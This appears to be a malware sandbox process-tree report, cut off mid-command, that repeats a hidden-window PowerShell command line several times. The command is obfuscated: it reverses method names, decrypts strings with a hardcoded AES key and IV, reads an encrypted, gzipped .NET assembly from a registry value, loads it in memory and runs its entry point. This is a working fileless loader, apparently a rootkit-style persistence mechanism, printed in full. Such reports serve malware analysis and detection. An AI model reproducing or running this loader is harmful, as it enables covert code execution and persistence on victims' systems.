$zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:9752
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6092" "3192" "3096" "3196" "0" "0" "3200" "0" "0" "0" "0" "0"
        30⤵
        
        PID:6712
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9528).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:9956
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9528).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:8524
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9528).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:1372
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9528).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = 